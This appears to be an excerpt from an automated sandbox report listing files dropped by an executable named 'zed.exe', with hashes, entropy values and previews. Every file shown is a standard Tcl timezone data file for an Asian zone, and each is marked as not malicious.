                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Nicosia) {.. {-9223372036854775808 8008 0 LMT}.. {-1518920008 7200 0 EET}.. {166572000 10800 1 EEST}.. {182293200 7200 0 EET}.. {200959200 10800 1 EEST}.. {213829200 7200 0 EET}.. {228866400 10800 1 EEST}.. {243982800 7200 0 EET}.. {260316000 10800 1 EEST}.. {276123600 7200 0 EET}.. {291765600 10800 1 EEST}.. {307486800 7200 0 EET}.. {323820000 10800 1 EEST}.. {338936400 7200 0 EET}.. {354664800 10800 1 EEST}.. {370386000 7200 0 EET}.. {386114400 10800 1 EEST}.. {401835600 7200 0 EET}.. {417564000 10800 1 EEST}.. {433285200 7200 0 EET}.. {449013600 10800 1 EEST}.. {465339600 7200 0 EET}.. {481068000 10800 1 EEST}.. {496789200 7200 0 EET}.. {512517600 10800 1 EEST}.. {528238800 7200 0 EET}.. {543967200 10800 1 EEST}.. {559688400 7200 0 EET}.. {575416800 10800 1 EEST}.. {591138000 7200 0 EET}.. {606866400 10800 1 EEST}.. {62258760
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2063
                                                                                                                                                                                                                                            Entropy (8bit):3.718004112421892
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:526enddzXJfsFN/3sFrOksF/sF7IyksF7FRZsFLsFTsFcsFk73sFK/XCFKTipnFf:5l40yVRB7VfXucydm46I/CTxwf
                                                                                                                                                                                                                                            MD5:513B6A2AF76DAED9002C037BEC99862F
                                                                                                                                                                                                                                            SHA1:82D1C47BDF46B8B901C35BACACE8595C093BF5F2
                                                                                                                                                                                                                                            SHA-256:96A445D47D834C28480D1E2036ECA4962B35AFA494C219065D4879F71C1830DB
                                                                                                                                                                                                                                            SHA-512:2FE5AF4FA9D6AAB4FBD8E354789B82D39FA1B52394D3A0ABFBC6A30A531E0B7429A3D9AC7835A2843A6E9859E0255565F151FDFC87004ACB4EBD1AAD40BDA8A4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Novokuznetsk) {.. {-9223372036854775808 20928 0 LMT}.. {-1441259328 21600 0 +06}.. {-1247551200 25200 0 +08}.. {354906000 28800 1 +08}.. {370713600 25200 0 +07}.. {386442000 28800 1 +08}.. {402249600 25200 0 +07}.. {417978000 28800 1 +08}.. {433785600 25200 0 +07}.. {449600400 28800 1 +08}.. {465332400 25200 0 +07}.. {481057200 28800 1 +08}.. {496782000 25200 0 +07}.. {512506800 28800 1 +08}.. {528231600 25200 0 +07}.. {543956400 28800 1 +08}.. {559681200 25200 0 +07}.. {575406000 28800 1 +08}.. {591130800 25200 0 +07}.. {606855600 28800 1 +08}.. {622580400 25200 0 +07}.. {638305200 28800 1 +08}.. {654634800 25200 0 +07}.. {670359600 21600 0 +07}.. {670363200 25200 1 +07}.. {686088000 21600 0 +06}.. {695764800 25200 0 +08}.. {701809200 28800 1 +08}.. {717534000 25200 0 +07}.. {733258800 28800 1 +08}.. {748983600 25200 0 +07}.. {
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2121
                                                                                                                                                                                                                                            Entropy (8bit):3.714792994893581
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:52sve20ruXJfsFN/3sFrOksF/sF7IyksF7FRZsFLsFTsFcsFk73sFK/XCFKTipnF:5Hc40yVRB7VfXu0TKmtTTDOWQ
                                                                                                                                                                                                                                            MD5:AC8C8D768503C8334A9FBAEF4C3A9CAB
                                                                                                                                                                                                                                            SHA1:CA10BB99E2D7AB329229759BD4801068A3AEB6D5
                                                                                                                                                                                                                                            SHA-256:EF799077291F6B3B19E0AEC88F224BB592FAAD09D30740F2376D3D20F2169639
                                                                                                                                                                                                                                            SHA-512:34049B1AC4254F999C3E5AD8CB31ABF88AC2D972E20E19927F33CC59935354F92125A0342A413E64227E8AE29DDFC2FFE5F67AE538C89D8EBAD7FCA889321DFA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Novosibirsk) {.. {-9223372036854775808 19900 0 LMT}.. {-1579476700 21600 0 +06}.. {-1247551200 25200 0 +08}.. {354906000 28800 1 +08}.. {370713600 25200 0 +07}.. {386442000 28800 1 +08}.. {402249600 25200 0 +07}.. {417978000 28800 1 +08}.. {433785600 25200 0 +07}.. {449600400 28800 1 +08}.. {465332400 25200 0 +07}.. {481057200 28800 1 +08}.. {496782000 25200 0 +07}.. {512506800 28800 1 +08}.. {528231600 25200 0 +07}.. {543956400 28800 1 +08}.. {559681200 25200 0 +07}.. {575406000 28800 1 +08}.. {591130800 25200 0 +07}.. {606855600 28800 1 +08}.. {622580400 25200 0 +07}.. {638305200 28800 1 +08}.. {654634800 25200 0 +07}.. {670359600 21600 0 +07}.. {670363200 25200 1 +07}.. {686088000 21600 0 +06}.. {695764800 25200 0 +08}.. {701809200 28800 1 +08}.. {717534000 25200 0 +07}.. {733258800 28800 1 +08}.. {738090000 25200 0 +07}.. {7
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2055
                                                                                                                                                                                                                                            Entropy (8bit):3.6912374223526396
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5abexPvO1FMnFP1FCnFHnFKqenFdDnFQgOnFxjPnFITnFonFJynFAT4TBThSv0FP:5asvjdqxph01NSvPETKmtTTDO0
                                                                                                                                                                                                                                            MD5:3E06B20B0B62AA09FA03082FAEE4FD62
                                                                                                                                                                                                                                            SHA1:8886EC80528ECA13D3364138BFFE92F881768169
                                                                                                                                                                                                                                            SHA-256:2605CD1E26E4AB48BCB4399BB5B17BAD115A47F87BA3DD54B55BB50C3FE82606
                                                                                                                                                                                                                                            SHA-512:04C1B6A898D12C8EA1B0B2F6665C870434061C63CC8F7A067BFC708E9828BA2E60104B82E2025E42D51DA2F485890C4D34EC0341EF466A7942649BE64F5EEE17
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Omsk) {.. {-9223372036854775808 17610 0 LMT}.. {-1582088010 18000 0 +05}.. {-1247547600 21600 0 +07}.. {354909600 25200 1 +07}.. {370717200 21600 0 +06}.. {386445600 25200 1 +07}.. {402253200 21600 0 +06}.. {417981600 25200 1 +07}.. {433789200 21600 0 +06}.. {449604000 25200 1 +07}.. {465336000 21600 0 +06}.. {481060800 25200 1 +07}.. {496785600 21600 0 +06}.. {512510400 25200 1 +07}.. {528235200 21600 0 +06}.. {543960000 25200 1 +07}.. {559684800 21600 0 +06}.. {575409600 25200 1 +07}.. {591134400 21600 0 +06}.. {606859200 25200 1 +07}.. {622584000 21600 0 +06}.. {638308800 25200 1 +07}.. {654638400 21600 0 +06}.. {670363200 18000 0 +06}.. {670366800 21600 1 +06}.. {686091600 18000 0 +05}.. {695768400 21600 0 +07}.. {701812800 25200 1 +07}.. {717537600 21600 0 +06}.. {733262400 25200 1 +07}.. {748987200 21600 0 +06}.. {76471200
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1664
                                                                                                                                                                                                                                            Entropy (8bit):3.708603813141953
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:53PvalvNhQQvmRKqv0fvzQIovWdvEGvDaDv7w9hYwr:JHaBNKs6b03zB0WJEuDa77w9hYA
                                                                                                                                                                                                                                            MD5:A3BD0C15642AE4F001F98F8E060E8374
                                                                                                                                                                                                                                            SHA1:366F3C7FD4000AC23B79AB0FF4429371ED323B81
                                                                                                                                                                                                                                            SHA-256:933BBCD7AE0BF59A5B4A6E0EF74C237FEEDC42E6A3AEB2158131AA70FBA6FE47
                                                                                                                                                                                                                                            SHA-512:16D8692D3EA96D3594E6220A6989BBFBB926A66EEBEB240C4DC68BE75C69C5206659D9D341D92AE6128928FD38A5F45B445621CBBBA4E4BA8C34C3AC52BF3C08
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Oral) {.. {-9223372036854775808 12324 0 LMT}.. {-1441164324 10800 0 +03}.. {-1247540400 18000 0 +05}.. {354913200 21600 1 +06}.. {370720800 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 14400 0 +04}.. {606866400 18000 1 +04}.. {622591200 14400 0 +04}.. {638316000 18000 1 +04}.. {654645600 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {701816400 14400 0 +04}.. {701820000 18000 1 +04}.. {717544800 14400 0 +04}.. {733269600 18000 1 +04}.. {74899440
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):180
                                                                                                                                                                                                                                            Entropy (8bit):4.958543249401788
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8VLYO5YFfXHAIgN8ELYOJARL/2WFKeHKLNM0WFKELt:SlSWB9vsM3y1LePHAIgKELtAN/2wKTNg
                                                                                                                                                                                                                                            MD5:EBF01E229CC41EB8B27650A3D668EDC1
                                                                                                                                                                                                                                            SHA1:33E1B252C1B45EAE326FCF8CC7C80C78A46F7E8D
                                                                                                                                                                                                                                            SHA-256:DCEE88876D00396918F43DECA421B6C9B02F84B5866A2CE16E641B814B390A9F
                                                                                                                                                                                                                                            SHA-512:80840600F37A256B8FD9933760FBAE7C13DE1E24EFD970E47BE8DEC731DFABF6D6FB76999BEEC775FF8C8B8719E94788ED7EEB04376A34C827ACB443F720F7E3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Bangkok)]} {.. LoadTimeZoneFile Asia/Bangkok..}..set TZData(:Asia/Phnom_Penh) $TZData(:Asia/Bangkok)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):369
                                                                                                                                                                                                                                            Entropy (8bit):4.492596995768464
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2wKT5PDm2OHUeoH99xV/1kc5k/MVSSFFCLkvScH+dMVSSFL1CnF4mMz:MB862L5bmdHFCRV/6c5kMxGLkHHaMxFn
                                                                                                                                                                                                                                            MD5:9ADB1A9E41A143A06116E24EA0A53D90
                                                                                                                                                                                                                                            SHA1:6E50B549E1A705C0090BD5EDE26F7DED78CDF71A
                                                                                                                                                                                                                                            SHA-256:AC8370AEDF5FE3FE1E80710CE117DEE23815BE377D418E4B4F3259A1930E8DBF
                                                                                                                                                                                                                                            SHA-512:92790B20B960AC518AB2E18F902C6E0BA887F268909F5571CAC1068F5E719CCF6943AE6902DA1B683E170658B5E7BE06C6A187C1C0A652DD052D5BD0B2A7B84D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Pontianak) {.. {-9223372036854775808 26240 0 LMT}.. {-1946186240 26240 0 PMT}.. {-1172906240 27000 0 +0730}.. {-881220600 32400 0 +09}.. {-766054800 27000 0 +0730}.. {-683883000 28800 0 +08}.. {-620812800 27000 0 +0730}.. {-189415800 28800 0 WITA}.. {567964800 25200 0 WIB}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):273
                                                                                                                                                                                                                                            Entropy (8bit):4.709411633376997
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2wK8cE4SDm2OHnNoH9Aw8vmVuT0vjLtcjviov:MB8620cExmdHnNCGv2Ezv
                                                                                                                                                                                                                                            MD5:727BBC1A1662B500F616F544A484F213
                                                                                                                                                                                                                                            SHA1:93C1D902D9D4AA4197C7D16C61FB784AC01D0DE5
                                                                                                                                                                                                                                            SHA-256:29BA17F756F5C0BBA30FEBF44E620504D04921C832BD1CB56E1B60EF288B57DF
                                                                                                                                                                                                                                            SHA-512:C3C91E2F180109FF33E6491722F679A1B8DCE8CD31DE006D7FF2CBE270C008E927507C953641D28EE77D139BBEA54DEA1B7DBD6C30B208DDAB1B58756C32AC02
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Pyongyang) {.. {-9223372036854775808 30180 0 LMT}.. {-1948782180 30600 0 KST}.. {-1830414600 32400 0 JST}.. {-768646800 32400 0 KST}.. {1439564400 30600 0 KST}.. {1525446000 32400 0 KST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):176
                                                                                                                                                                                                                                            Entropy (8bit):4.851251407399968
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/2WFKK3ovXMXGm2OHPFV4YoHsQKb3VvVsRYovFFF3FRVGsWr:SlSWB9eg/2wKK3yXDm2OHoYoHxcvSNFS
                                                                                                                                                                                                                                            MD5:CBA9635133F88AD3B27E23B95430C27C
                                                                                                                                                                                                                                            SHA1:5E41232EC03BBC71B522F58CB2D05E6BFFFF1A75
                                                                                                                                                                                                                                            SHA-256:18CCA69F933795CE3F7DB31506EFC063E6CE1DFDCAB32AA387C398456D7F7E1F
                                                                                                                                                                                                                                            SHA-512:D7C43F1F9ADA54C914ADB3CB2C9063EB7044089CFC7755ACFD08828CDEBA3C116AE2BE916ABE5D561E63699B921BC52636DD0BBC2C4304F813616D320D7DDAAF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Qatar) {.. {-9223372036854775808 12368 0 LMT}.. {-1577935568 14400 0 +04}.. {76190400 10800 0 +03}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1668
                                                                                                                                                                                                                                            Entropy (8bit):3.7299735983334195
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5DwvalvNhQQvmRKqv0fvzQIovWdvEGvDaDvs5vZlovKWyvNSvTqvIQvyovklvqQA:BMaBNKs6b03zB0WJEuDa7sFZiKWaN6TE
                                                                                                                                                                                                                                            MD5:F5DBE4E72FA5AB0019CC98C8E21EC86E
                                                                                                                                                                                                                                            SHA1:27ECB901AA07C18EA7F38235E8EFE0B1635FEFBC
                                                                                                                                                                                                                                            SHA-256:4191629B874C988291E8FD13E675A3ED685D677F6541313975FC4610E47F1DCD
                                                                                                                                                                                                                                            SHA-512:D5EFD4EFFFFE2E41909AEB7B67BD1FA6FAF4B8E9AC645518D5B33BD1B3C5084F59D47D4ED052E0D4B9F9989BDDBA3AECB3D1E67F5237914D24C01F9C95242396
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Qostanay) {.. {-9223372036854775808 15268 0 LMT}.. {-1441167268 14400 0 +04}.. {-1247544000 18000 0 +05}.. {354913200 21600 1 +06}.. {370720800 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {695772000 18000 0 +05}.. {701816400 21600 1 +05}.. {717541200 18000 0 +05}.. {733266000 21600 1 +05}.. {7489
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1670
                                                                                                                                                                                                                                            Entropy (8bit):3.734572151642808
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5NvalvNhQQvmRKqv0fvzQIovWdvEGvDaDvs5vZlovKWgvNSvTqvIQvyovklvqQX0:TaBNKs6b03zB0WJEuDa7sFZiKWcN6Tir
                                                                                                                                                                                                                                            MD5:026EC6E479EC006C4398288362254680
                                                                                                                                                                                                                                            SHA1:24AD03DD21DA394B3423D27211955BFD694F8E73
                                                                                                                                                                                                                                            SHA-256:CD6B067AA3EF6935B4E89CA36E6A03FCB97F1E0EE61A7B5D46C06BF4DE140774
                                                                                                                                                                                                                                            SHA-512:023AC55E118F13A31CE996C7BA155C90D47DEB6C223EEB3C0EE7B702871FF0CCA13CDF61D65FDDABE41B888CD7A74274AA5730059CC5688F8ED4DDBF8FE4ECA4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Qyzylorda) {.. {-9223372036854775808 15712 0 LMT}.. {-1441167712 14400 0 +04}.. {-1247544000 18000 0 +05}.. {354913200 21600 1 +06}.. {370720800 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {701812800 18000 0 +05}.. {701816400 21600 1 +05}.. {717541200 18000 0 +05}.. {733266000 21600 1 +05}.. {748990800 18000 0 +05}.. {764
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):174
                                                                                                                                                                                                                                            Entropy (8bit):4.812955128020714
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8nv3vXHAIgNnDA6RL/2WFK02KQMFfh4WFKsyn:SlSWB9vsM3yHvPHAIg15N/2wK0GEJ4wy
                                                                                                                                                                                                                                            MD5:BD3F294F1EDDD21467E980C9F5A0E7DE
                                                                                                                                                                                                                                            SHA1:11A3FC3E4489C18BDF9BFFB4C44615559D9DD99D
                                                                                                                                                                                                                                            SHA-256:E4D2C38D8E7377A528291A88129CDAC40CA4D40A5F1CD8ADB98228527556906E
                                                                                                                                                                                                                                            SHA-512:FA5FD600627793EABB83C1066BE246A47BCCE1FC57830596B9C0CDE8901B949AF178ABDE876C3B73CC3751312E8A4C03C390888B0B5A9669F511344143F83073
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Yangon)]} {.. LoadTimeZoneFile Asia/Yangon..}..set TZData(:Asia/Rangoon) $TZData(:Asia/Yangon)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):148
                                                                                                                                                                                                                                            Entropy (8bit):4.973311159904374
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/2WFK814PMXGm2OHFukeoHqUi9VssWYcv:SlSWB9eg/2wK81GDm2OHF7eoHvi9V1Wr
                                                                                                                                                                                                                                            MD5:AD3236CFF141732831732357AB181EE3
                                                                                                                                                                                                                                            SHA1:EAF51A63898A2048EA5FBE9BA4C001EEE37FFDB2
                                                                                                                                                                                                                                            SHA-256:411E31D09FFA48E44169C42661AE2F7FC142460BCAA216837D8C4740983CA7BD
                                                                                                                                                                                                                                            SHA-512:6CA2D89C02568580786BE98A863453ADCF4D21CAC52E5B44C4F7A05E76D29AEB3E28E353D6FB758BB553DBC8F35389462B388F61E94C68F5DB50A3E8C429336D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Riyadh) {.. {-9223372036854775808 11212 0 LMT}.. {-719636812 10800 0 +03}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):188
                                                                                                                                                                                                                                            Entropy (8bit):4.946090704619887
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8I65eV5XHAIgN2h6560ARL/2WFKwJ6h4WFK365ey:SlSWB9vsM3yJAVJHAIgA4k0AN/2wKl4i
                                                                                                                                                                                                                                            MD5:0766480A295525EE5D65F1ED32094858
                                                                                                                                                                                                                                            SHA1:7A2D68E1009DDD809A4A700931456C617DCD343A
                                                                                                                                                                                                                                            SHA-256:C695981A0DF691C3F4509999FBC52858ADC75024CCCBDEFBE1094FED17E809E4
                                                                                                                                                                                                                                            SHA-512:A21536FB61A64E953E8D6414FF0AEF1BC7E68A33C5DCF7090517A91FC449B96A93A4FBDF2C00682540D1193FDB29603349F5BDB455FD90045FDBCA61247A9860
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Ho_Chi_Minh)]} {.. LoadTimeZoneFile Asia/Ho_Chi_Minh..}..set TZData(:Asia/Saigon) $TZData(:Asia/Ho_Chi_Minh)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2117
                                                                                                                                                                                                                                            Entropy (8bit):3.7276904131666577
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5q+3Vv+0j6lua2Gg/3gO8UoflcXRDhUBAc+:YxIa2GOT8tiXBC6c+
                                                                                                                                                                                                                                            MD5:295D51B8FBBE890C97637687B8F32322
                                                                                                                                                                                                                                            SHA1:7BB72B0EC783898DDF625D275E3BBB964D1693FB
                                                                                                                                                                                                                                            SHA-256:D7D0EA5CEF908442AB0D777A4B097BED18540CD5280FF63F33DD989E27E72908
                                                                                                                                                                                                                                            SHA-512:9B3E3BA01EAE38A00B0EE8A8FB17191CB4ED2EE9E46AE06403BA8C1193804764C86599840DC03E0C6A631456E1BE2BC560BDF6CF0450068EF78A6E494041326C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Sakhalin) {.. {-9223372036854775808 34248 0 LMT}.. {-2031039048 32400 0 +09}.. {-768560400 39600 0 +12}.. {354891600 43200 1 +12}.. {370699200 39600 0 +11}.. {386427600 43200 1 +12}.. {402235200 39600 0 +11}.. {417963600 43200 1 +12}.. {433771200 39600 0 +11}.. {449586000 43200 1 +12}.. {465318000 39600 0 +11}.. {481042800 43200 1 +12}.. {496767600 39600 0 +11}.. {512492400 43200 1 +12}.. {528217200 39600 0 +11}.. {543942000 43200 1 +12}.. {559666800 39600 0 +11}.. {575391600 43200 1 +12}.. {591116400 39600 0 +11}.. {606841200 43200 1 +12}.. {622566000 39600 0 +11}.. {638290800 43200 1 +12}.. {654620400 39600 0 +11}.. {670345200 36000 0 +11}.. {670348800 39600 1 +11}.. {686073600 36000 0 +10}.. {695750400 39600 0 +12}.. {701794800 43200 1 +12}.. {717519600 39600 0 +11}.. {733244400 43200 1 +12}.. {748969200 39600 0 +11}.. {76469
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):879
                                                                                                                                                                                                                                            Entropy (8bit):3.9460497720710506
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5t8eZd7QvalvNhQQvmRKqvzQfv7PQIovWxrvEGvDWdDvs5v/RlovKT10Sv6r:5MvalvNhQQvmRKqv0fvzQIovWdvEGvDO
                                                                                                                                                                                                                                            MD5:10A758996B0DF756E520541BEA9B7D75
                                                                                                                                                                                                                                            SHA1:137E5FD4E00CFA4B3939EF11868862B7F93D87CD
                                                                                                                                                                                                                                            SHA-256:35E4B905723891281D9A6A0A1FD3760A3A48136E1419C686BE31ACE83BF7AA9D
                                                                                                                                                                                                                                            SHA-512:7E32661731EAB2ED8C387533ACCB4853F5B6225BAC11E93247E7B06D7AA856E6A665F63718BFE395CFD00F80A4C16789D7097FFA8DAD88B1D707BF9C155C1D4C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Samarkand) {.. {-9223372036854775808 16073 0 LMT}.. {-1441168073 14400 0 +04}.. {-1247544000 18000 0 +05}.. {354913200 21600 1 +06}.. {370720800 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 21600 1 +05}.. {686091600 18000 0 +05}.. {694206000 18000 0 +05}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):985
                                                                                                                                                                                                                                            Entropy (8bit):4.121802167517286
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5AemgvHzF+zg2c+z3NGmJhIUfqII8yHg/zoD:5F/nfWUBISHg/G
                                                                                                                                                                                                                                            MD5:A1DE6975DEA70D7241B5B3C43E1EA3AA
                                                                                                                                                                                                                                            SHA1:35EE563A2BCA77C761F7E878997763EA8D258040
                                                                                                                                                                                                                                            SHA-256:C4F82C94650572FE4D03BC1FE54CED8F4BF55DFBEE855D52DE3EA6378240AF93
                                                                                                                                                                                                                                            SHA-512:1639B0609115DBEA6A381986A732A5CA1523952AEF84843B4D714D5B2FF40B16C4166D8D60D31D4FC2C2BA34DED1F6DB39474336195603562265BDBF71687696
